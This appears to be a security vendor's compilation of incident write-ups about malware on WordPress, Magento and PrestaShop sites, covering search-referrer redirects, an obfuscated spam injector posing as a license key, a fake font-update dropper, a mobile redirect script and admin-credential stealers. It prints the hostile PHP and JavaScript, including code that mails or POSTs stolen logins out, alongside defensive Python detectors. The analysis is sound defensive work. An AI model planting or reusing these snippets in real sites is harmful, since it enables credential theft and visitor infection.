Conditional redirection to an online pharmacy store

During an investigation, a client reported strange behavior: every visitor who arrived by clicking one of their results in a Google search was instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at Google.com.

The malware redirected all incoming visits from Google.com searches to hxxxs://pharm-bay(.)com.

After further investigation, we found that the attacker had simply hidden the malicious code in an extensionless file named “log” in the site's tmp folder.

That file was then loaded by ./wp-config.php, to which the attacker had added a PHP include statement pointing at the log file.

Here is the conditional redirection rule snippet from the /tmp/log file.

...
if ($content = $client->getContent()) {
    if ((strpos($_SERVER['HTTP_USER_AGENT'], 'google') !== false) || (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false)) {
        echo $content;
        die;
    } elseif ((strpos($_SERVER['HTTP_REFERER'], 'google') !== false) || (strpos($_SERVER['HTTP_REFERER'], 'bing') !== false)) {
        if ($_SERVER['REQUEST_URI'] != '/') {
            ?><script src=hxxp://scipton(.)com/doorways/default/script/script4.js></script><?php
            die;
        }
    }
}
...

As you can see, the malicious code first serves the content fetched via $client->getContent() to any client whose user agent contains “google” or “bot” (i.e. to crawlers). For everyone else it checks whether the referrer is Google or Bing, and if so it serves the malicious JavaScript, which redirects the visitor to the hxxxs://pharm-bay(.)com pharmacy store.
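One way to hunt for this kind of injection on disk, as an added example that is not part of the original post: a small Python scanner that flags includes of extensionless or temp-directory files (as in the modified wp-config.php) and conditionals that branch on HTTP_REFERER / HTTP_USER_AGENT, name search engines, and then emit a script or die(). The two sample snippets are constructed and modelled on the code above; the script URL is a placeholder.

```python
import re

# Constructed samples modelled on the snippets above (not the actual malware);
# the script URL is a placeholder.
WP_CONFIG_SAMPLE = """<?php
define('DB_NAME', 'wp');
include('/tmp/log');
require_once(ABSPATH . 'wp-settings.php');
"""

LOG_SAMPLE = """<?php
if ((strpos($_SERVER['HTTP_USER_AGENT'], 'google') !== false)
    || (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false)) {
    echo $content; die;
} elseif ((strpos($_SERVER['HTTP_REFERER'], 'google') !== false)
    || (strpos($_SERVER['HTTP_REFERER'], 'bing') !== false)) {
    if ($_SERVER['REQUEST_URI'] != '/') { ?><script src=hxxp://doorway.invalid/script4.js></script><?php die; }
}
"""

SEARCH_ENGINES = re.compile(r"google|bing|yahoo|yandex", re.I)
INCLUDE_RE = re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
TEMP_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')

def suspicious_includes(php: str) -> list:
    """Included paths that live in a temp directory or lack a .php extension."""
    hits = []
    for m in INCLUDE_RE.finditer(php):
        path = m.group(3)
        if path.startswith(TEMP_DIRS) or not path.lower().endswith('.php'):
            hits.append(path)
    return hits

def referrer_cloaking(php: str) -> list:
    """Conditionals keyed on HTTP_REFERER / HTTP_USER_AGENT that mention search
    engines and then inject a remote script, echo foreign content or die()."""
    findings = []
    for m in re.finditer(r"\b(if|elseif)\s*\((.*?)\)\s*\{(.*?)\}", php, re.S):
        cond, body = m.group(2), m.group(3)
        if 'HTTP_REFERER' in cond and SEARCH_ENGINES.search(cond) and \
                re.search(r"<script[^>]+src=|header\s*\(\s*['\"]Location|\bdie\b", body, re.I):
            findings.append({'header': 'HTTP_REFERER', 'condition': ' '.join(cond.split())})
        if 'HTTP_USER_AGENT' in cond and re.search(r"google|bot", cond, re.I) and \
                re.search(r"\becho\s+\$\w+|\bdie\b", body):
            findings.append({'header': 'HTTP_USER_AGENT', 'condition': ' '.join(cond.split())})
    return findings

if __name__ == '__main__':
    print(suspicious_includes(WP_CONFIG_SAMPLE))
    for f in referrer_cloaking(LOG_SAMPLE):
        print(f['header'], '->', f['condition'][:70])
```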

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Spam Injector Disguised as a License Key

A client reported strange spam URLs injected into their WordPress website. After an investigation, it turned out that the attacker had hidden the encoded spam injector in the following theme file:

./wp-content/themes/toolbox/functions.php

The attacker formatted the encoded injector to look like a theme license key, so that anyone reviewing the file would not suspect the code and find the malware:

/**
 * Theme personal token soft descriptor.
 */
function theme_personal_token() {
    // Your personal token key #00118
    $token = <<<KEY
eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJldmFs
KFwiPz5cIi5nemluZmxhdGUoYmFzZTY0X2RlY29kZSgkeCkpKTsiLCJ1cGRhdGUiOiJiWkY3YzZK
SUZNV1wvaXV0UWcxYXlHdkU5eG14RUVCXC9CRnhBbGxrVzEwa2hMODdDN0llcVE3NzQ0czdzMTJk
MFwvNzdtbjd2MmRleFwvXC9pTndveFwvbmRJdzBEeTRiNzBJYUZ3eFVGRGdZTUZuYUF3a2J0YjUz
...
ZlBsemhjNHZNNXlpNFlkdk5SU0JGRFlmQU43R2lJWXdZN0dEcnMyK1wvdGRyc1ZuVHY1cDh3UFN2
eGpHVHp4blkrUFhcL1phODVtbWJcL2lJM3hhXC9mdjFISEl4ZVpHMlRkXC9MYlRUNEFQc3h2XC94
MUU2eTlIY1wvMkhjZHBUNVN3TTUzUnRSRzd1Mnd0S3Ywd3VcL2RcL0FUaGJzczg3OHlQcXJsd0Ur
STJyRkVRNkJEVzNMUVRpYmlqT0laejlNNEg4YTk1eFQ3RHl6TUw1ZHpybVwvcVQ1RFAwbUtXZUNQ
UHdFPSJ9
KEY;
    if( $token = json_decode( base64_decode( $token ), true ) ) {
        $token['license'] = $token['license']( $token['account'], $token['theme'] );
        $token['license']( $token['update'] );
    }
}
add_action( 'wp_footer', 'theme_personal_token' );

The injected code contained several layers of encoding to obfuscate it further, but we can begin by base64-decoding the text in the $token variable:

{"license":"create_function","account":"$x","theme":"eval(\"?>\".gzinflate(base64_decode($x)));","update":"bZF7c6JIFMW\/iutQg1ayGvE9xmxEEB\/BFxAllkW10khL87C7IeqQ7744s7s12d0\/77mn7v2dex\/\/iNwox\/ndIw0Dy4b70IaFwxUFDgYMFnaAwkbtb53Hry+7HVUP0lx4nagtPB4IRHPoKhp5WgUfpso0WEwmpNG8zDzQjNv6UDhLZ+iY1VmtIpPVsG43kDR8d+vjiUJG7eVUqRwNJYjkPdbvjn2g...skipped...\/LbTT4APsxv\/x1E6y9Hc\/2HcdpT5SwM53RtRG7u2wtKv0wu\/d\/AThbss878yPqrlwE+I2rFEQ6BDW3LQTibijOIZz9M4H8a95xT7DyzML5dzrm\/qT5DP0mKWeCPPwE="}

As the decoded content shows, the attacker is still trying to disguise the malware as a theme licensing key. The keys map directly onto the PHP above: ‘license’ names create_function, ‘account’ is the parameter $x, ‘theme’ is the function body eval(gzinflate(base64_decode($x))), and ‘update’ is the compressed, base64-encoded payload that is passed to it.

The inner payload also checks the user agent: it shows the spam URLs to every other user agent and search engine except the ones listed below. The aim is to hide the links from web-based link-analysis tools, which might otherwise cache them and alert the client:

if(!preg_match('#ia_archiver|Baidu|MJ12|Ezooms|Solomono|roger|Linkpad|Semrush|prodvigator|Survey|Alexi|Xenu|Ahrefs|serpstat|Yandex#i', $k)

The final decoded payload, with the hidden links as they would appear in the HTML source:

<a href="hxxps://credit-10[.]com/no/komplett-bank-logg-inn/" style="position:absolute;left:-9998px;">komplett bank min side</a>
<a href="hxxp://emporium[.]com.ua/answear" style="position:absolute;left:-9998px;">промокод ансвер</a>
<a href="hxxps://evehealth[.]ru/promokody/shops/promokody-onetwotrip" style="position:absolute;left:-9998px;">onetwotrip промокод</a>
<a href="hxxps://promocodius[.]com/us/shops/iherb" style="position:absolute;left:-9998px;">iherb coupon</a>

The links are hard-coded in this malware, but on other sites they may differ. The spam domains, however, remain mostly the same.
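An added example (not code from the original post) that peels the layers the license-key disguise uses: base64, then JSON, then base64 plus gzinflate for the “update” member, and finally extracts the anchors pushed off-screen with left:-9998px. The real token is not reproduced; build_sample_token() constructs an equivalent one from a placeholder payload, and PHP's gzinflate() is raw DEFLATE, which Python's zlib handles with wbits=-15.

```python
import base64
import json
import re
import zlib

def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() is raw DEFLATE (no zlib or gzip header): wbits = -15."""
    return zlib.decompress(data, -15)

def gzdeflate(data: bytes) -> bytes:
    """Counterpart of PHP's gzdeflate(), used only to build the sample token."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def decode_fake_license(token: str) -> dict:
    """Peel the layers: base64 -> JSON -> 'update' member: base64 -> gzinflate."""
    outer = json.loads(base64.b64decode(token))
    verdict = {'stages': [], 'payload': None, 'hidden_links': []}
    if outer.get('license') == 'create_function':
        verdict['stages'].append("'license' is create_function: a function is built from attacker strings")
    if re.search(r'eval\(|gzinflate\(|base64_decode\(', outer.get('theme', '')):
        verdict['stages'].append("'theme' is the function body: eval(gzinflate(base64_decode($x)))")
    if 'update' in outer:
        payload = gzinflate(base64.b64decode(outer['update'])).decode('utf-8', 'replace')
        verdict['payload'] = payload
        # Anchors pushed far off-screen with absolute positioning are the spam injection.
        verdict['hidden_links'] = re.findall(r'<a\s+href="([^"]+)"[^>]*left:\s*-\d{3,}px', payload)
    return verdict

def build_sample_token(payload_php: str) -> str:
    """Constructed stand-in for the $token heredoc above (the real one is not reproduced)."""
    inner = base64.b64encode(gzdeflate(payload_php.encode())).decode()
    outer = {'license': 'create_function', 'account': '$x',
             'theme': 'eval("?>".gzinflate(base64_decode($x)));', 'update': inner}
    return base64.b64encode(json.dumps(outer).encode()).decode()

# Constructed payload with placeholder spam domains; the UA filter mirrors the one above.
SAMPLE_PAYLOAD = (
    '<?php if(!preg_match("#ia_archiver|Ahrefs|Semrush#i", $_SERVER["HTTP_USER_AGENT"])) { ?>'
    '<a href="hxxps://spam-a.invalid/x" style="position:absolute;left:-9998px;">spam a</a>'
    '<a href="hxxps://spam-b.invalid/y" style="position:absolute;left:-9998px;">spam b</a>'
    '<?php } ?>')

if __name__ == '__main__':
    result = decode_fake_license(build_sample_token(SAMPLE_PAYLOAD))
    print('\n'.join(result['stages']))
    print('hidden links:', result['hidden_links'])
```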


Fake Font Dropper

A website owner asked us to investigate odd behavior on their site. It randomly showed a popup window about a missing font, telling visitors that they could not view the site's content because their computers lacked a font the website required, called “HoeflerText”, as shown in this screenshot:


The malware tried to trick visitors into clicking the “Update” button, which downloads a malicious file named Font_Update.exe.

The injected code sat at the top of the WordPress core file ./index.php and begins by checking the browser type and version; in this case it targets only Chrome, as the code below shows:

<script>
if (!!window.chrome && !!window.chrome.webstore) {
    function FPGo() {
        search = unescape('%2F%5B%5E%3C%3E%5C%5C%6E%5C%5C%73%5D%2F%69%67%6D'); // decodes to the regex /[^<>\\n\\s]/igm
        pr = document.body.innerHTML;
        result = pr.match(/>(\w?\s?.*?)</g);
        result_arr = [];
        for (var i = 0; i < result.length; i++) {
            result_arr[i] = result[i].replace(eval(search), '&#0;')
        }
        for (var i = 0; i < result.length; i++) {
            pr = pr.replace(result[i], result_arr[i])
        }
        document.body.innerHTML = pr
    }
    FPGo();
}
</script>

The regex and replacement loop in this code are what make the page display incorrectly: the decoded regex matches nearly every character of the page text and each match is replaced with “&#0;”, so the page looks damaged or corrupted. That is meant to convince visitors that the missing font on their computer is the cause.

The other part of the malicious code is the one below, which shows the popup window and the alert about the missing “HoeflerText” font:

<div id="dm-table">
    <a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a>
    <img id="l0gos" alt='' />
    <p id="pphh">The "HoeflerText" font wasn't found.</p>
</div>
<div id="odiv9">
    <p id="info1">The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p>
    <p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Font_Update.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p>
    <div id="divtabl">
        <table id="tabl1">
            <tbody id="tbody1">
                <tr id="trtr1">
                    <td id="tdtd1">Manufacturer:</td>
                    <td id="tdtd1">Google Inc. All Rights Reserved</td>
                </tr>
                <tr id="trtr1">
                    <td id="tdtd1">Current version:</td>
                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td>
                </tr>
                <tr id="trtr1">
                    <td id="tdtd1">Latest version:</td>
                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td>
                </tr>
            </tbody>
        </table>
        <div id="helpimg"><img id="inf0s" alt='' /></div>
    </div>
    <form action="https://another-hacked-website.com/avx/images/x86x.php" method="post" id="form_1d"><input type='hidden' name='infol' value='i+veHk+yCYMGJN0u3V+Nq1SdFdRlNVmXm+k+oC6hANGXowqEYpTQww==' /></form>
    <div id="upe0" onclick="ue0()"><a href="javascript:void(0)" id="b00tn">Update</a></div>
</div>
</div>
</div>
</div>
<div id="popup-container" class="popup-window gc" style="display:none;">
    <div class="bigarrow element-animation"></div>

The attackers stored the hxxps://Another-Hacked-site[.]dom/avx/images/x86x.php file on another compromised website.

Once the visitor clicks the Update button to download the “fix” for the missing font, they are redirected to a Dropbox URL hosting the malicious Font_Update.exe file.
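As an added example, not from the original post: decoding the unescape() argument above shows the regex that is fed to eval(), and the same script checks an injected page for the strings this dropper relies on. The sample page is constructed from fragments of the code above.

```python
import re
from urllib.parse import unquote

# Strings this dropper depends on (taken from the injected code above).
INDICATORS = ('window.chrome.webstore', 'document.body.innerHTML', '&#0;',
              'HoeflerText', 'Chrome Font Pack', 'Font_Update.exe')

def decode_js_unescape(source: str) -> list:
    """Plaintext of every unescape('%..') argument; JS unescape() is %XX/%uXXXX decoding."""
    out = []
    for enc in re.findall(r"unescape\(\s*'([^']*)'\s*\)", source):
        # Handle %uXXXX first, then the %XX bytes that unquote() understands.
        enc = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), enc)
        out.append(unquote(enc))
    return out

def scan_font_dropper(page: str) -> dict:
    decoded = decode_js_unescape(page)
    found = [i for i in INDICATORS if i in page]
    # A decoded string shaped like a regex literal that is then passed to eval() is
    # the corruption step: the regex strips the page text character by character.
    regex_via_eval = 'eval(' in page and any(re.fullmatch(r'/.*/[a-z]*', d) for d in decoded)
    return {'decoded_unescape': decoded, 'indicators': found,
            'regex_via_eval': regex_via_eval,
            'suspicious': regex_via_eval or len(found) >= 3}

# Constructed page built from fragments of the injected code above.
SAMPLE_PAGE = """<script>if (!!window.chrome && !!window.chrome.webstore) {
function FPGo() { search = unescape('%2F%5B%5E%3C%3E%5C%5C%6E%5C%5C%73%5D%2F%69%67%6D');
pr = document.body.innerHTML; r = pr.match(/>(\\w?\\s?.*?)</g);
for (var i = 0; i < r.length; i++) { pr = pr.replace(r[i], r[i].replace(eval(search), '&#0;')) }
document.body.innerHTML = pr } FPGo(); }</script>
<p id="pphh">The "HoeflerText" font wasn't found.</p>
<p>To fix the error you have to update the "Chrome Font Pack". Click on the Font_Update.exe item.</p>"""

if __name__ == '__main__':
    print(scan_font_dropper(SAMPLE_PAGE))
```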

Conclusion: This incident shows how important website security is to both website owners and visitors. Website owners carry a large responsibility to provide a malware-free experience to their visitors, members and customers, especially on eCommerce sites, so that visitors' computers and other devices are not infected with viruses or spyware. Such malware can cause data loss or steal sensitive information (such as logins, passwords and credit card details) used on other websites for purchases and online banking; it can spy on the user's actions and log keystrokes, remotely monitor and control infected computers and smartphones, use them to launch attacks (e.g. DDoS), and perform many other malicious actions.


Mobile Malware Targets eCommerce Websites & Users

Mobile malware is malicious software that targets mobile phones, tablets and similar devices. Attacks range from fatal damage to the OS (bricking) to leakage of sensitive personal information such as credit card data, saved passwords, pictures and much more.


With the constant growth of mobile users, attackers are focusing their efforts on developing malware targeting those devices. In this article, we’ll describe how we detected an interesting attack against an ecommerce platform.

During an incident response investigation, we identified malicious code in a Magento installation, in the file ./js/mage/cookies.js. Here is the snippet:

var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type=\"text/javascript\" src=\"hxxp://Malicious-URL-REMOVED.com/odessa/?md2\"><\/script>", "write"];
function isMobile() {
    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
    if (/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i [_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {
        return true
    };
    return false
}
if (isMobile() === true) {
    document[_$_f51c[6]](_$_f51c[5])
}

The isMobile() function checks whether the visitor's user agent matches its predefined list of smartphones and tablets; if it does, the remote script tag is written into the page and the user is redirected to other malicious websites.
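An added example, not from the original post, that resolves the _$_f51c[...] string-array indirection so the script reads as plain navigator.userAgent / document.write(...) calls. The sample is a shortened, constructed version of the snippet above with the remote URL replaced by a placeholder.

```python
import json
import re

def deobfuscate_string_array(js: str) -> str:
    """Inline a `var NAME = ["..", ".."];` lookup table into the code that uses it."""
    m = re.search(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*\[(.*?)\];', js, re.S)
    if not m:
        return js
    name, body = m.group(1), m.group(2)
    # JS string literals with \" and \/ escapes parse as JSON strings.
    strings = json.loads('[' + body + ']')
    code = js[:m.start()] + js[m.end():]      # drop the table definition itself

    def lookup(mm):
        return strings[int(mm.group(1))]

    # obj[NAME[i]]  ->  obj.prop   (or obj["str"] when not a valid identifier)
    def member(mm):
        s = lookup(mm)
        return '.' + s if re.fullmatch(r'[A-Za-z_$][\w$]*', s) else '[' + json.dumps(s) + ']'
    code = re.sub(r'\[' + re.escape(name) + r'\[(\d+)\]\]', member, code)
    # bare NAME[i]  ->  "str"
    code = re.sub(re.escape(name) + r'\[(\d+)\]', lambda mm: json.dumps(lookup(mm)), code)
    return code.strip()

# Constructed, shortened version of the snippet above; the remote URL is a placeholder.
SAMPLE_JS = r'''var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type=\"text/javascript\" src=\"hxxp://malicious.invalid/odessa/?md2\"><\/script>", "write"];
function isMobile() {
    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
    if (/android.+mobile|iemobile|ip(hone|od|ad)/i [_$_f51c[3]](_0x1CF01) || /1207|6310|6590/i [_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {
        return true
    };
    return false
}
if (isMobile() === true) { document[_$_f51c[6]](_$_f51c[5]) }'''

if __name__ == '__main__':
    print(deobfuscate_string_array(SAMPLE_JS))
```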

Those other websites prompt the visitor to install third-party software that claims to clean or speed up the device, toolbars or adware, or, even worse, lead to malicious URLs distributing ransomware that locks the device and holds it hostage until a given amount of money is paid to the attacker in bitcoin.

Depending on the attacker's campaign, they may also redirect visitors or potential buyers to competitor websites, which has a huge impact on the site owner's revenue. Keep in mind that these attacks are not limited to Magento: they may target WordPress, Joomla, OpenCart, PrestaShop and various other platforms.

To detect and prevent these issues, we highly recommend having a file integrity monitoring system in place and keeping clean backups of your files and database. If your environment is compromised, you can then identify and promptly restore the affected files, preventing further damage to your online presence and SEO.

Feel free to contact us if you are experiencing a similar issue or if you have any other security concerns.

PrestaShop Login Stealer

Lately we have noticed an increase in credential-stealing attempts and techniques targeting e-commerce websites. These sites usually hold sensitive information (credit card data and back-end credentials) that lets attackers take advantage of both the information and the infected website.

This post covers a different technique used against PrestaShop installations; it differs from the one we described in this blog post here.

In this case the attackers also used the ‘./controllers/admin/AdminLoginController.php’ file, but they injected different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:


<?php
if (function_exists("mail")) {
    $listo = array('eNyong' => 'a<removed>@<removed>mail.com', 'Dowoh' => 'm<removed>l@<removed>mail.com');
    foreach ($listo as $ming => $imel) {
        mail($imel, 'Setoran Admin '.$_SERVER['HTTP_HOST'].' ^^', "Kye Pak $ming,\n\nNama: ".$employee->firstname." ".$employee->lastname."\nEmail: $email\nPassword: $passwd");
    }
} else {
    $f = fopen('uspas.txt', 'a');
    fwrite($f, "imel:$email | pass: $passwd\n");
    fclose($f);
}
?>

The attackers used an interesting conditional statement so that they would get the information they were after regardless of server limitations: the code checks whether the server can send mail and, if so, emails the sensitive data to the listed addresses; if not, it simply appends the username and password to a file named ‘uspas.txt’ on the server.

From there the attackers could simply choose between checking the e-mail and fetching the .txt file from the victim's website.

In the case of a compromise, all user accounts and their personal information should be considered stolen, so it is recommended to change all passwords: back-end, cPanel, SFTP and any other connection mechanism that could give attackers leverage.

A business's reputation can be damaged if sensitive information falls into the wrong hands or customers' credit card data is used without authorization, so keeping to good security practices, such as file integrity monitoring, a web application firewall and other measures, helps reduce the risk of infection.

Magento Login credentials stealer

While investigating a compromised Magento-based eCommerce website, we found malicious code used to steal credentials and maintain unauthorized access to user accounts.

This malicious code was found inside the ./app/code/core/Mage/Admin/Model/Session.php core file; it posts the stolen credentials to a malicious URL every time a user logs into their own account:

$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username, $password, $user->getEmail(), Mage::helper('core/url')->getCurrentUrl())));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
$output = curl_exec($ch);
curl_close($ch);

The above malicious code sends the stolen username and password (together with the user's email address and the current URL, as the code shows) by POST to the URL hidden in this part of the code: base64_decode(REMOVED MALICIOUS CODE)

The URL is base64-encoded; in this case it decoded to the following malicious address:

http://infected-site.com/404.php
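An added example (not the authors' code) covering both the PrestaShop mail()/fwrite() stealer above and this Magento curl POST: it scans PHP for exfiltration sinks whose arguments, directly or via one intermediate variable, reference credential variables, and for eval(gzinflate(base64_decode(...))) loaders. The sample PHP is constructed from the two snippets with placeholder addresses and URLs.

```python
import re

# Variable names that carry credentials in login controllers / session models.
CRED_VARS = r"\$(passwd|password|pass|pwd|username|user|email|login)\b"

# Exfiltration sinks and obfuscated loaders; group 1 is the argument expression.
SINKS = {
    'mail':   re.compile(r"\bmail\s*\((.*?)\);", re.S),
    'fwrite': re.compile(r"\bfwrite\s*\((.*?)\);", re.S),
    'curl':   re.compile(r"curl_setopt\s*\(\s*\$\w+\s*,\s*CURLOPT_POSTFIELDS\s*,\s*(.*?)\);", re.S),
    'eval':   re.compile(r"\beval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I),
}

def tainted_vars(php: str) -> set:
    """Variables assigned from an expression that references a credential variable."""
    tainted = set()
    for m in re.finditer(r"\$(\w+)\s*=(?![=>])(.*?);", php, re.S):
        if re.search(CRED_VARS, m.group(2)):
            tainted.add(m.group(1))
    return tainted

def find_credential_exfil(php: str) -> list:
    """(sink, excerpt) for each sink fed a credential variable, directly or via one
    intermediate assignment, plus any eval() of a decoded/inflated blob."""
    tainted = sorted(tainted_vars(php))
    pattern = CRED_VARS + (r"|\$(" + "|".join(map(re.escape, tainted)) + r")\b" if tainted else "")
    names = re.compile(pattern)
    hits = []
    for kind, rx in SINKS.items():
        for m in rx.finditer(php):
            if kind == 'eval' or names.search(m.group(1)):
                hits.append((kind, ' '.join(m.group(0).split())[:60]))
    return hits

# Constructed sample assembled from the two snippets above (addresses/URLs are placeholders).
SAMPLE_PHP = r'''<?php
eval(gzinflate(base64_decode("<CONTENT EDITED>")));
if (function_exists("mail")) {
    $listo = array('eNyong' => 'a@example.invalid', 'Dowoh' => 'm@example.invalid');
    foreach ($listo as $ming => $imel) {
        mail($imel, 'Setoran Admin '.$_SERVER['HTTP_HOST'].' ^^', "Kye Pak $ming,\n\nNama: ".$employee->firstname."\nEmail: $email\nPassword: $passwd");
    }
} else {
    $f = fopen('uspas.txt', 'a');
    fwrite($f, "imel:$email | pass: $passwd\n");
    fclose($f);
}
$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username, $password, $user->getEmail())));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode("<REMOVED>"));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$output = curl_exec($ch);
'''

if __name__ == '__main__':
    for kind, excerpt in find_credential_exfil(SAMPLE_PHP):
        print(f'{kind:7s} {excerpt}')
```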

Customer personal information (including full names, email addresses and physical addresses, and possibly stored credit card and payment information) must be considered compromised and leaked.

The hacker may also redirect the payments to their own PayPal account or to any other payment gateways to steal money too, as long as they have full control over the administration panel of the Magento website.

Such attacks can have a severe negative impact on your business reputation and your customers' trust.

It’s always a good practice to keep your website updated and properly maintained as well as using applications, themes, and extensions/plugins from trusted sources only.

It’s time now to secure your website from hackers!